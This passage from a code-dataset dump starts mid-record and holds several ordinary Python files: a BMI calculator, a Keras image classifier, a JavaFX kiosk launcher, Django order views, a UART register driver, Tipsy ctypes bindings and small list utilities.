axis='both')\r\n\r\nplt.subplot(3,1,2)\r\nplt.plot(t, z_rot, color='red', label='Hor_Angle')\r\nplt.grid(which='both', axis='both')\r\nplt.xlabel('Time /s')\r\nplt.ylabel('Angle /urad')\r\nplt.title('Hor_Angle')\r\n\r\nplt.subplot(3,1,3)\r\nplt.plot(t, x_rot, color='black', label='Ver_Angle')\r\nplt.grid(which='both', axis='both')\r\nplt.title('Ver_Angle')\r\nplt.xlabel('Time /s')\r\nplt.ylabel('Angle /urad')\r\n\r\nfigManager = plt.get_current_fig_manager()\r\nfigManager.window.showMaximized()\r\nplt.tight_layout()\r\n\r\nplt.show()\r\n","sub_path":"Test_trigger_record.py","file_name":"Test_trigger_record.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"430125985","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 13 15:42:24 2021\n\n@author: Henao\n\"\"\"\n\ndef calcular_BMI(peso_en_libras: float, estatura_en_pulgadas: float)-> float:\n '''\n Algorithm to calculate the body mass from your weight in pounds and your height in inches.\n Parameters\n ----------\n peso_en_libras : float\n Weight in pounds\n estatura_en_pulgadas : float\n Height in inches\n\n\n Returns\n ----------\n float\n \n BMI: your body mass index \n \n '''\n peso = peso_en_libras * 0.45\n altura = estatura_en_pulgadas * 0.025\n BMI = round(float(peso / (altura**2)),2)\n return BMI\n \n \npeso_en_libras = float(input(\"Enter your weight in pounds : \"))\nestatura_en_pulgadas = float(input(\"Enter your height in inches: \"))\nindice = calcular_BMI(peso_en_libras , estatura_en_pulgadas)\nprint(\"su imc es: \", indice)\n#print(\"Your body mass index is: \" , calcular_BMI(peso_en_libras, estatura_en_pulgadas))","sub_path":"calcular_BMI.py","file_name":"calcular_BMI.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"231250675","text":"# 80%\n\n# 0. 사용할 패키지 불러오기\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Dropout, Activation\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras import backend as K\n\nimg_w, img_h = 150, 150\ntrain_data_dir = './dataset/training_set'\ntest_data_dir = './dataset/test_set'\nnb_train_samples = 100\nnb_test_samples = 50\nepochs = 25\nbatch_size = 16\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_w, img_h)\nelse:\n input_shape = (img_w, img_h, 3)\n\n# 1. dataset 생성\n# 변화를 줘서 부풀리기.\ntrain_datagen = ImageDataGenerator(rescale=1./255,\n # rotation_range=15,\n # width_shift_range=0.1,\n # height_shift_range=0.1,\n shear_range=0.5,\n zoom_range=[0.8, 2.0],\n horizontal_flip=True,\n # vertical_flip=True,\n fill_mode='nearest')\n\n# 훈련용 generator 생성\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir, # img 경로\n target_size=(img_w, img_h), # 패치 이미지 크기\n batch_size=batch_size, # 배치 크기\n class_mode='categorical') # categorical/binary/sparse/None\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n# 검증용 generator 생성\ntest_generator = test_datagen.flow_from_directory(\n test_data_dir,\n target_size=(img_w, img_h),\n batch_size=batch_size,\n class_mode='categorical')\n\n\n\n# 2. 모델 구성하기\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), input_shape=input_shape, activation='relu'))\n# model.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64, activation='relu'))\n# model.add(Dense(256, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(3, activation='sigmoid'))\n\n# 3. 모델 학습과정 설정하기\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n# model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n\n\n\n\n# 4. 모델 학습시키기\nmodel.fit_generator(train_generator, steps_per_epoch=nb_train_samples, epochs=epochs, validation_data=test_generator, validation_steps=nb_test_samples)\nmodel.save_weights('test_model.h5')\n\n# 5. 모델 평가하기\nprint(\"-- Evaluate(정확도) --\")\nscores = model.evaluate_generator(test_generator, steps=5)\nprint(\"%s: %.2f%%\" %(model.metrics_names[1], scores[1]*100))\n#\n# # 6. 모델 저장하기\n# from keras.models import load_model\n# model.save('testModel.h5')\n","sub_path":"cnn/makeModel.py","file_name":"makeModel.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"41700144","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport shutil\nimport signal\nimport subprocess\n\n# Absolute path to Gluon JavaFX directory\nSYSTEM_INIT_BIN = \"/usr/sbin/init\"\nGLUON_JAVAFX_PATH = \"/opt/javafx-sdk\"\n\n\n# Helper method to split JVM properties specified as -Dkey=value\ndef jvm_property(data):\n parts = tuple(str(data).split('=', 1))\n return parts if len(parts) == 2 else (parts[0], '')\n\n\n# Parse known arguments and preserve others\nparser = argparse.ArgumentParser(description='Gluon JavaFX Kiosk Launcher', allow_abbrev=False)\nparser.add_argument('--add-modules', default='')\nparser.add_argument('-p', '--module-path', default='')\nparser.add_argument('-D', default=[], action='append', type=jvm_property, dest='properties')\nargs, unknown_args = parser.parse_known_args()\n\n# Patch '--module-path' option\nmodule_path = list(filter(None, args.module_path.split(':')))\nmodule_path.insert(0, GLUON_JAVAFX_PATH + '/lib')\n\n# Patch '--add-modules' option\nadd_modules = list(filter(None, args.add_modules.split(',')))\nadd_modules.insert(0, 'javafx.controls')\n\n# Patch generic properties\nproperties = dict(filter(None, args.properties))\nproperties.setdefault('glass.platform', 'Monocle')\nproperties.setdefault('monocle.platform', 'EGL')\nproperties.setdefault('monocle.platform.traceConfig', 'false')\nproperties.setdefault('monocle.egl.lib', GLUON_JAVAFX_PATH + '/lib/libgluon_drm.so')\nproperties.setdefault('egl.displayid', '/dev/dri/card0')\nproperties.setdefault('javafx.verbose', 'false')\nproperties.setdefault('prism.verbose', 'false')\n\n# Patch 'java.library.path' property\njava_library_path = list(filter(None, properties.get('java.library.path', '').split(':')))\njava_library_path.insert(0, GLUON_JAVAFX_PATH + '/lib')\nproperties['java.library.path'] = ':'.join(java_library_path)\n\n# Patch environment variables\njvm_env = os.environ.copy()\njvm_env['ENABLE_GLUON_COMMERCIAL_EXTENSIONS'] = 'true'\n\n# Build final list of JVM arguments\njvm_args = [\n '--module-path', ':'.join(module_path),\n '--add-modules', ','.join(add_modules),\n]\njvm_args.extend(['-D' + key + '=' + value for key, value in properties.items()])\njvm_args.extend(unknown_args)\n\n# Search for absolute path of JVM\njvm_path = shutil.which('java')\nif jvm_path is None:\n parser.error(\"Unable to find 'java' binary in current PATH\")\n\n# Ensure we are running as root\nif os.geteuid() != 0:\n parser.error(\"Unable to execute 'java-kiosk' without running as root\")\n\n# Run application in kiosk mode\ntry:\n # Ignore Ctrl+C for python process to ensure completion\n signal.signal(signal.SIGINT, lambda signum, frame: None)\n\n # Switch to runlevel 3 to stop X11\n subprocess.run([SYSTEM_INIT_BIN, '3'])\n\n # Execute JVM with patched options\n subprocess.run([jvm_path] + jvm_args, env=jvm_env)\nexcept KeyboardInterrupt:\n # Silently ignore KeyboardInterrupt, we expect the user to sometimes abort the script\n pass\nfinally:\n # Switch back to runlevel 5 to start X11\n subprocess.run([SYSTEM_INIT_BIN, '5'])\n","sub_path":"image/resources/java/java-kiosk.py","file_name":"java-kiosk.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"549269187","text":"import nltk\nfrom nltk.corpus import ConllChunkCorpusReader\n\nfrom nltk.corpus.reader.tagged import TaggedCorpusReader\nroot = '/usr/local/share/nltk_data/corpora/MASC-for-NE/'\nmasc_for_ne = TaggedCorpusReader(root,'.*', '_')\n\nsents = masc_for_ne.tagged_sents()\nne_sents = [nltk.ne_chunk(sent) for sent in sents]\n\nroot = \"/usr/local/share/nltk_data/corpora/masc_conll/\"\ngold_corpus = ConllChunkCorpusReader(root,r\".*\\.conll\", chunk_types=(\"DATE\",\"PERSON\",\"ORGANIZATION\",\"LOCATION\"))\ngold_sents = gold_corpus.chunked_sents()\n\n","sub_path":"classes/vassar/Linguistics_HW_4/Prob3/init_masc_ne.py","file_name":"init_masc_ne.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"353570048","text":"from django.shortcuts import render\n\nfrom website.models.order_model import Order\nfrom website.models.product_order_model import ProductOrder\nfrom website.models.product_model import Product\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseForbidden\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\n\ndef order_detail(request, order_id):\n\t\"\"\"\n This function is invoked to display the details of a user's order.\n\n ---Arguments---\n request: the full HTTP request object\n order_id(integer): the id of the order\n\n ---GET---\n Renders order_detail.html\n\n ---Context---\n 'order'(instance): the order instance\n 'orderproducts'(list): a list of the products on the order \n 'total'(integer): the total cost of an order\n\n Author: Blaise Roberts\n \"\"\"\n\n\ttemplate_name = 'order_detail.html'\n\torder = Order.objects.get(pk=order_id)\n\n\tif request.user == order.user:\n\t\t# Get seller object\n\t\tline_items = ProductOrder.objects.filter(order=order_id).values_list(\n\t\t\t'product_id').distinct()\n\t\tproduct_list = list()\n\t\ttotal = int()\n\t\tfor x in line_items:\n\t\t\tproduct = Product.objects.filter(pk=x[0])\n\t\t\tproduct_count = ProductOrder.objects.filter(product_id=x[0], \n\t\t\t\torder=order_id).count()\n\t\t\tsubtotal = product[0].price * product_count\n\t\t\ttotal += subtotal\n\t\t\tproduct_list.append((product, product_count, subtotal))\n\t\treturn render(request, template_name, {'order': order, \"orderproducts\":\n\t\t\tproduct_list, \"total\":total})\n\telse:\n\t\treturn HttpResponseForbidden('''Not your order, bruh! \n\t\t\t ''')\n\ndef delete_product_from_order(request, product_id, order_id):\n\n\t\"\"\"\n This function is invoked to delete a product from a user's order.\n\n ---Arguments---\n request: the full HTTP request object\n product_id(integer): the id of the product\n order_id(integer): the id of the order\n\n ---Return---\n Returns HttpResponseRedirect to order_detail\n\n Author: Jeremy Bakker and Jessica Younker\n \"\"\"\n\n\torder = Order.objects.get(pk=order_id, user=request.user)\n\tif request.user == order.user:\n\t\tProductOrder.objects.filter(product_id=product_id, \n\t\t\torder_id=order_id).delete()\n\t\treturn HttpResponseRedirect(reverse('website:order_detail', \n\t\t\targs=[order.id]))\n\telse:\n\t\treturn HttpResponseForbidden('''Not your order, bruh! \n\t\t\t ''')","sub_path":"website/views/order_detail_view.py","file_name":"order_detail_view.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"549207238","text":"import matplotlib.pyplot as plt\r\n\r\ndef func1():\r\n\tfd = open(\"build_tvp_time.log\", \"r\")\r\n\t# wfd = open(\"build_tvp_time.ana.log\", \"w\")\r\n\tn_lines = 0;\r\n\tx_r = []\r\n\ty_r = []\r\n\tfor line in fd:\r\n\t\tn_lines += 1\r\n\t\tif(n_lines > 1 and n_lines < 10246 and (n_lines - 2) % 3 == 0):\r\n\t\t\ta = line.find('size: [') + len('size: [')\r\n\t\t\tb = line.find(']', a)\r\n\t\t\tsub1 = (line[a:b])\r\n\t\t\tc = line.find('time: [') + len('time: [')\r\n\t\t\td = line.find(' s', c)\r\n\t\t\tsub2 = (line[c:d])\r\n\t\t\t# buf = \"%5d %f\\n\" % (int(sub1), float(sub2))\r\n\t\t\t# buf = str(sub1) + \" \" + str(sub2) + '\\n'\r\n\t\t\t# wfd.write(buf);\r\n\r\n\t\t\tx_r.append(int(sub1))\r\n\t\t\ty_r.append(float(sub2))\r\n\r\n\r\n\tfd.close()\r\n\t# wfd.flush()\r\n\t# wfd.close()\r\n\r\n\tfig = plt.figure()\r\n\tax1 = fig.add_subplot(111)\r\n\tax1.set_title('tvp build time (NBA dataset)')\r\n\tplt.xlabel('number of nodes associated with keyword')\r\n\tplt.ylabel(\"build time (second)\")\r\n\tss1 = ax1.scatter(x_r, y_r, c = 'r', marker = 'x')\r\n\tplt.legend([ss1], ['one keyword'], loc='upper left')\r\n\tplt.show()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tfunc1()\r\n","sub_path":"nba_demo/build_tvp_time.py","file_name":"build_tvp_time.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"348849518","text":"import serial\nfrom struct import *\nfrom misoclib.tools.litescope.host.driver.reg import *\n\ndef write_b(uart, data):\n\tuart.write(pack('B',data))\n\nclass LiteScopeUARTDriver:\n\tcmds = {\n\t\t\"write\"\t: 0x01,\n\t\t\"read\"\t: 0x02\n\t}\n\tdef __init__(self, port, baudrate=115200, addrmap=None, busword=8, debug=False):\n\t\tself.port = port\n\t\tself.baudrate = str(baudrate)\n\t\tself.debug = debug\n\t\tself.uart = serial.Serial(port, baudrate, timeout=0.25)\n\t\tself.regs = build_map(addrmap, busword, self.read, self.write)\n\n\tdef open(self):\n\t\tself.uart.flushOutput()\n\t\tself.uart.close()\n\t\tself.uart.open()\n\t\tself.uart.flushInput()\n\t\ttry:\n\t\t\tself.regs.uart2wb_sel.write(1)\n\t\texcept:\n\t\t\tpass\n\n\tdef close(self):\n\t\ttry:\n\t\t\tself.regs.uart2wb_sel.write(0)\n\t\texcept:\n\t\t\tpass\n\t\tself.uart.flushOutput()\n\t\tself.uart.close()\n\n\tdef read(self, addr, burst_length=None, repeats=None):\n\t\tdatas = []\n\t\tdef to_int(v):\n\t\t\treturn 1 if v is None else v\n\t\tfor i in range(to_int(repeats)):\n\t\t\tself.uart.flushInput()\n\t\t\twrite_b(self.uart, self.cmds[\"read\"])\n\t\t\twrite_b(self.uart, burst_length)\n\t\t\twrite_b(self.uart, (addr//4 & 0xff000000) >> 24)\n\t\t\twrite_b(self.uart, (addr//4 & 0x00ff0000) >> 16)\n\t\t\twrite_b(self.uart, (addr//4 & 0x0000ff00) >> 8)\n\t\t\twrite_b(self.uart, (addr//4 & 0x000000ff))\n\t\t\tfor j in range(to_int(burst_length)):\n\t\t\t\tdata = 0\n\t\t\t\tfor k in range(4):\n\t\t\t\t\tdata = data << 8\n\t\t\t\t\tdata |= ord(self.uart.read())\n\t\t\t\tif self.debug:\n\t\t\t\t\tprint(\"RD %08X @ %08X\" %(data, (addr+j)*4))\n\t\t\t\tdatas.append(data)\n\t\treturn datas\n\n\tdef write(self, addr, data):\n\t\tif isinstance(data, list):\n\t\t\tburst_length = len(data)\n\t\telse:\n\t\t\tburst_length = 1\n\t\twrite_b(self.uart, self.cmds[\"write\"])\n\t\twrite_b(self.uart, burst_length)\n\t\twrite_b(self.uart, (addr//4 & 0xff000000) >> 24)\n\t\twrite_b(self.uart, (addr//4 & 0x00ff0000) >> 16)\n\t\twrite_b(self.uart, (addr//4 & 0x0000ff00) >> 8)\n\t\twrite_b(self.uart, (addr//4 & 0x000000ff))\n\t\tif isinstance(data, list):\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdat = data[i]\n\t\t\t\tfor j in range(4):\n\t\t\t\t\twrite_b(self.uart, (dat & 0xff000000) >> 24)\n\t\t\t\t\tdat = dat << 8\n\t\t\t\tif self.debug:\n\t\t\t\t\tprint(\"WR %08X @ %08X\" %(data[i], (addr + i)*4))\n\t\telse:\n\t\t\tdat = data\n\t\t\tfor j in range(4):\n\t\t\t\twrite_b(self.uart, (dat & 0xff000000) >> 24)\n\t\t\t\tdat = dat << 8\n\t\t\tif self.debug:\n\t\t\t\tprint(\"WR %08X @ %08X\" %(data, (addr * 4)))\n","sub_path":"misoclib/tools/litescope/host/driver/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"206291049","text":"import ctypes\nimport numpy as np\nimport numpy.ctypeslib as npct\n\n\"\"\"\n The mapping between the C and Python type interfaces for Tipsy.\n This is the lowest level of the Tipsy-Python interface. It is\n not intended for general use.' \n\"\"\"\n\n_native_float32_dtype = np.dtype('=f')\n_array_1d_float32 = npct.ndpointer(dtype=_native_float32_dtype, ndim=1, flags=('C','O','W','A'))\n_array_2d_float32 = npct.ndpointer(dtype=_native_float32_dtype, ndim=2, flags=('C','O','W','A'))\n\ndef _convert_array(x, name):\n if x is None:\n raise ValueError(name + ' cannot be None')\n if not isinstance(x, np.ndarray):\n raise TypeError(name + ' is not a numpy array')\n return np.require(x, dtype=_native_float32_dtype, requirements=['C_CONTIGUOUS', 'ALIGNED', 'WRITEABLE', 'OWNDATA', 'ENSUREARRAY'])\n\ndef _make_array(size, ndims=1, zero=False):\n if ndims == 1:\n return np.empty(size, dtype=_native_float32_dtype) if not zero else np.zeros(size, dtype=_native_float32_dtype)\n if ndims == 2:\n return np.empty((size, 3), dtype=_native_float32_dtype) if not zero else np.zeros((size, 3), dtype=_native_float32_dtype)\n raise ValueError(\"tipsy only supports 1d and 2d arrays\")\n\ndef _pretty_print(obj, attrs):\n repr = []\n for k in attrs:\n a = getattr(obj, k)\n repr.append('{0:10s}: {1:s}'.format(k, str(a.shape) if isinstance(a, np.ndarray) else str(a)))\n return '\\n'.join(repr)\n\nclass header():\n class struct(ctypes.Structure):\n _fields_ = [\n ('time' , ctypes.c_double),\n ('nbodies', ctypes.c_uint),\n ('ndim' , ctypes.c_int),\n ('ngas' , ctypes.c_uint),\n ('ndark' , ctypes.c_uint),\n ('nstar' , ctypes.c_uint)\n ]\n\n @classmethod\n def from_external(cls, hdr):\n self = cls()\n self.time = hdr.time\n self.nbodies = hdr.nbodies\n self.ndim = hdr.ndim\n self.ngas = hdr.ngas\n self.ndark = hdr.ndark\n self.nstar = hdr.nstar\n return self\n\n def __init__(self):\n self.c_data = header.struct()\n\n def __str__(self):\n return _pretty_print(self, ['time','nbodies','ngas','ndark','nstar'])\n \n @property\n def time(self):\n return self.c_data.time\n @time.setter\n def time(self, rhs):\n self.c_data.time = rhs\n @property\n def nbodies(self):\n return self.c_data.nbodies\n @nbodies.setter\n def nbodies(self, rhs):\n self.c_data.nbodies = rhs\n @property\n def ngas(self):\n return self.c_data.ngas\n @ngas.setter\n def ngas(self, rhs):\n self.c_data.ngas = rhs\n @property\n def ndark(self):\n return self.c_data.ndark\n @ndark.setter\n def ndark(self, rhs):\n self.c_data.ndark = rhs\n @property\n def nstar(self):\n return self.c_data.nstar\n @nstar.setter\n def nstar(self, rhs):\n self.c_data.nstar = rhs\n\n @classmethod\n def from_external(cls, time, ngas, ndark, nstar):\n self = cls()\n self.time = float(time)\n self.nbodies = int(ngas) + int(ndark) + int(nstar)\n self.ndim = 3\n self.ngas = int(ngas)\n self.ndark = int(ndark)\n self.nstar = int(nstar)\n self.c_data = header.struct.from_external(self)\n return self\n\nclass gas_data():\n class struct(ctypes.Structure):\n _fields_ = [\n ('mass' , _array_1d_float32),\n ('pos' , _array_2d_float32),\n ('vel' , _array_2d_float32),\n ('rho' , _array_1d_float32),\n ('temp' , _array_1d_float32),\n ('hsmooth', _array_1d_float32),\n ('metals' , _array_1d_float32),\n ('phi' , _array_1d_float32),\n ('size' , ctypes.c_size_t)\n ]\n \n def __init__(self):\n super().__init__()\n \n @classmethod\n def from_external(cls, other):\n self = cls()\n self.mass = other.mass.ctypes.data_as(_array_1d_float32)\n self.pos = other.pos.ctypes.data_as(_array_2d_float32)\n self.vel = other.vel.ctypes.data_as(_array_2d_float32)\n self.rho = other.rho.ctypes.data_as(_array_1d_float32)\n self.temp = other.temp.ctypes.data_as(_array_1d_float32)\n self.metals = other.metals.ctypes.data_as(_array_1d_float32)\n self.hsmooth = other.hsmooth.ctypes.data_as(_array_1d_float32)\n self.phi = other.phi.ctypes.data_as(_array_1d_float32)\n self.size = other.size\n return self\n\n def __init__(self):\n self.size = 0\n self.c_data = None\n \n def __str__(self):\n if self.c_data is not None:\n return _pretty_print(self, [k[0] for k in self.c_data._fields_])\n\n @classmethod\n def from_size(cls, size):\n self = cls()\n self.mass = _make_array(size)\n self.pos = _make_array(size, ndims=2)\n self.vel = _make_array(size, ndims=2)\n self.rho = _make_array(size)\n self.temp = _make_array(size)\n self.metals = _make_array(size)\n self.hsmooth = _make_array(size)\n self.phi = _make_array(size)\n self.size = size\n self.c_data = gas_data.struct.from_external(self)\n return self\n\n @classmethod\n def from_external(cls, mass, pos, vel, rho, temp, hsmooth, metals, phi, size):\n self = cls()\n self.mass = _convert_array(mass, 'mass')\n self.pos = _convert_array(pos, 'pos')\n self.vel = _convert_array(vel, 'vel')\n self.rho = _convert_array(rho, 'rho')\n self.temp = _convert_array(temp, 'temp')\n self.hsmooth = _convert_array(hsmooth, 'hsmooth')\n self.metals = _convert_array(metals, 'metals')\n self.phi = _convert_array(phi, 'phi')\n self.size = size\n self.c_data = gas_data.struct.from_external(self)\n return self\n\nclass dark_data():\n class struct(ctypes.Structure):\n _fields_ = [\n ('mass', _array_1d_float32),\n ('pos' , _array_2d_float32),\n ('vel' , _array_2d_float32),\n ('soft', _array_1d_float32),\n ('phi' , _array_1d_float32),\n ('size', ctypes.c_size_t)\n ]\n \n def __init__(self):\n super().__init__()\n \n @classmethod\n def from_external(cls, other):\n self = cls()\n self.mass = other.mass.ctypes.data_as(_array_1d_float32)\n self.pos = other.pos.ctypes.data_as(_array_2d_float32)\n self.vel = other.vel.ctypes.data_as(_array_2d_float32)\n self.phi = other.phi.ctypes.data_as(_array_1d_float32)\n self.soft = other.soft.ctypes.data_as(_array_1d_float32)\n self.size = other.size\n return self\n\n def __init__(self):\n self.size = 0\n self.c_data = None\n \n def __str__(self):\n if self.c_data is not None:\n return _pretty_print(self, [k[0] for k in self.c_data._fields_])\n \n @classmethod\n def from_size(cls, size):\n self = cls()\n self.mass = _make_array(size)\n self.pos = _make_array(size, ndims=2)\n self.vel = _make_array(size, ndims=2)\n self.phi = _make_array(size)\n self.soft = _make_array(size)\n self.size = size\n self.c_data = dark_data.struct.from_external(self)\n return self\n \n @classmethod\n def from_external(cls, mass, pos, vel, soft, phi, size):\n self = cls()\n self.mass = _convert_array(mass, 'mass')\n self.pos = _convert_array(pos, 'pos')\n self.vel = _convert_array(vel, 'vel')\n self.phi = _convert_array(phi, 'phi')\n \n if soft is not None and np.isscalar(soft):\n self.soft = _make_array(size, zero=True)\n self.soft += np.asscalar(np.array(soft, dtype=_native_float32_dtype))\n else:\n self.soft = _convert_array(soft, 'soft')\n \n self.size = size\n self.c_data = dark_data.struct.from_external(self)\n return self\n\nclass star_data():\n class struct(ctypes.Structure):\n _fields_ = [\n ('mass' , _array_1d_float32),\n ('pos' , _array_2d_float32),\n ('vel' , _array_2d_float32),\n ('metals', _array_1d_float32),\n ('tform' , _array_1d_float32),\n ('soft' , _array_1d_float32),\n ('phi' , _array_1d_float32),\n ('size' , ctypes.c_size_t)\n ]\n \n def __init__(self):\n super().__init__()\n\n @classmethod\n def from_external(cls, other):\n self = cls()\n self.mass = other.mass.ctypes.data_as(_array_1d_float32)\n self.pos = other.pos.ctypes.data_as(_array_2d_float32)\n self.vel = other.vel.ctypes.data_as(_array_2d_float32)\n self.metals = other.metals.ctypes.data_as(_array_1d_float32)\n self.tform = other.tform.ctypes.data_as(_array_1d_float32)\n self.phi = other.phi.ctypes.data_as(_array_1d_float32)\n self.soft = other.soft.ctypes.data_as(_array_1d_float32)\n self.size = other.size\n return self\n\n def __init__(self):\n self.size = 0\n self.c_data = None\n \n def __str__(self):\n if self.c_data is not None:\n return _pretty_print(self, [k[0] for k in self.c_data._fields_])\n \n @classmethod\n def from_size(cls, size):\n self = cls()\n self.mass = _make_array(size)\n self.pos = _make_array(size, ndims=2)\n self.vel = _make_array(size, ndims=2)\n self.metals = _make_array(size)\n self.tform = _make_array(size)\n self.phi = _make_array(size)\n self.soft = _make_array(size)\n self.size = size\n self.c_data = star_data.struct.from_external(self)\n return self\n\n @classmethod\n def from_external(cls, mass, pos, vel, metals, tform, soft, phi, size):\n self = cls()\n self.mass = _convert_array(mass, 'mass')\n self.pos = _convert_array(pos, 'pos')\n self.vel = _convert_array(vel, 'vel')\n self.metals = _convert_array(metals, 'metals')\n self.tform = _convert_array(tform, 'tform')\n self.phi = _convert_array(phi, 'phi')\n \n if soft is not None and np.isscalar(soft):\n self.soft = _make_array(size, zero=True)\n self.soft += np.asscalar(np.array(soft, dtype=_native_float32_dtype))\n else:\n self.soft = _convert_array(soft, 'soft')\n \n self.size = size\n self.c_data = star_data.struct.from_external(self)\n return self\n\n","sub_path":"tipsy_c.py","file_name":"tipsy_c.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"456153486","text":"import logging\n\n\nclass numList:\n \"\"\"This is a numList class.\n\n Attributes:\n :maxMin (tuple): tuple of the Max and Min values in the list\n\n :max_diff (list): list of the highest diff between 2 adj values in list\n\n :list_add (int): sum of all the values in the list\n\n \"\"\"\n\n def __init__(self, myList=[]):\n self.list = myList\n self.maxMin = None\n self.max_diff = None\n self.list_add = None\n self.max_Min()\n self.find_diff()\n self.find_sum()\n\n def max_Min(self):\n \"\"\"\n Finds the max and min in a list of positive values and returns a tuple\n\n :param inputList: Is a list of positive values\n :returns: Tuple of the max and min values\n :raises ImportError: If numpy is not installed in the env\n :raises ValueError: If there are values less than 0\n :raises TypeError: If the inputList is not an actual list\n \"\"\"\n\n inputList = self.list\n logging.basicConfig(filename='log.txt', level=logging.DEBUG)\n\n try:\n import numpy\n except ImportError:\n logging.error(\"missing a module!\")\n raise ImportError(\"missing a module!\")\n for i in inputList:\n if i < 0:\n logging.warning(\"Negative value detected\")\n raise ValueError('Negative value detected')\n if not isinstance(inputList, list):\n logging.warning('Input is not a list')\n raise TypeError('Input is not a list')\n myMin = min(inputList)\n myMax = max(inputList)\n logging.debug(inputList)\n logging.debug('Min value: %s', myMin)\n logging.debug('Max value: %s', myMax)\n maxMinTuple = (myMin, myMax)\n logging.info(maxMinTuple)\n self.maxMin = maxMinTuple\n\n def find_diff(self):\n \"\"\"\n Finds maximum difference between two adjacent numbers in a list\n\n :param my_list: Is a list of numbers\n :returns: Largest difference between two adjacent numbers\n :raises ValueError: If my_list has 0 or 1 elements\n :raises ImportError: If numpy is not installed in environment\n :raises TypeError: If element in my_list is not an int, float, complex\n \"\"\"\n\n my_list = self.list\n logging.basicConfig(filename='log.txt', level=logging.DEBUG)\n\n logging.info('Finding max difference between adjacent values in list')\n logging.debug('Printing %s', str(my_list))\n n = 0\n if len(my_list) < 2:\n logging.warning('Not enough values to calculate difference')\n raise ValueError('List too small, no difference to compare!')\n for i in range(len(my_list)-1):\n if(isinstance(my_list[i], (int, float, complex)) and\n isinstance(my_list[i+1], (int, float, complex))):\n diff = abs(my_list[i+1] - my_list[i])\n if diff > n:\n n = diff\n else:\n raise TypeError('List elements must be int, float, complex!')\n logging.debug('Returns %s', str(n))\n self.max_diff = n\n\n def find_sum(self):\n \"\"\"\n Adds a lenist of numbers\n\n :param list_var: Is a list of numbers (int, float, complex)\n :returns: Addition of values in list\n :raises ValueError: If list_var is empty\n :raises ImportError: If numpy or numbers not installed in environment\n :raises TypeError: If element in list_var is not an int, float,complex\n \"\"\"\n list_var = self.list\n try:\n import logging\n except ImportError:\n logging.warning('ImportError Logging')\n raise ImportError('Module Logging not found.')\n logging.basicConfig(filename='log.txt', level=logging.DEBUG)\n try:\n import numpy as np\n except ImportError:\n logging.warning('ImportError Numpy')\n raise ImportError('Module Numpy not found.')\n if len(list_var) == 0:\n raise ValueError('Input list is empty')\n try:\n import numbers\n except ImportError:\n logging.warning('ImportError Numbers')\n raise ImportError('Module Numbers not found.')\n if not isinstance(list_var, list):\n logging.warning('Input is not a list')\n for x in list_var:\n if isinstance(x, (int, float, complex)):\n continue\n else:\n logging.warning('List elements must be int, float or complex')\n raise TypeError('List elements must be int, float, or complex')\n logging.debug(list_var)\n value = np.sum(list_var)\n logging.info(value)\n self.list_add = value\n","sub_path":"numList.py","file_name":"numList.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
